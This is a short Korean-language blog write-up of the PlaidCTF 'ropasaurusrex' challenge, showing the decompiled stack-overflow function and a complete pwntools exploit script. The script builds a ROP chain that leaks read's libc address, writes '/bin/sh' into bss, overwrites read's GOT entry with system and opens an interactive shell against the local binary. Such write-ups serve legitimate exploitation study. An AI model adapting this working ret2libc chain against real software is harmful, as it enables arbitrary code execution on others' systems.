Plaidctf Ropasaurusrex Writeup

LeeDoHyun · March 17, 2020

본 문제는 PlaidCTF에 나온 ROP문제입니다.

main함수에서 sub_80483F4 함수를 호출하는데 IDA로 이 함수를 디컴파일 해서 보면 오버플로우가 터지는것을 확인할 수 있습니다.

ssize_t sub_80483F4()
{
  char buf; // [esp+10h] [ebp-88h]

  return read(0, &buf, 0x100u);                 // overflow
}

간단하게 익스는 read를 릭한후, bss에 binsh가 들어갈 공간을 만들어주고 system함수를 호출해주면 됩니다.

ex.py

from pwn import *

context.log_level = "debug"
r = process("./ropasaurusrex")
e = ELF("./ropasaurusrex")
libc = e.libc

read_plt = e.plt["read"]
read_got = e.got["read"]
write_plt = e.plt["write"]
pppr = 0x80484b6
bss = e.bss()
binsh = "/bin/sh\x00"

payload = "A"*(0x88 + 0x4)
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(read_got)
payload += p32(4)

payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(len(binsh))

payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(read_got)
payload += p32(4)

payload += p32(read_plt)
payload += "aaaa"
payload += p32(bss)
r.sendline(payload)

read_leak = u32(r.recv(4))
base = read_leak - libc.symbols["read"]
system = base + libc.symbols["system"]

info("read_leak = " + hex(read_leak))
info("base addr = " + hex(base))
info("system addr = " + hex(system))

payload = binsh
payload += p32(system)
r.sendline(payload)
r.interactive()

Twitter, Facebook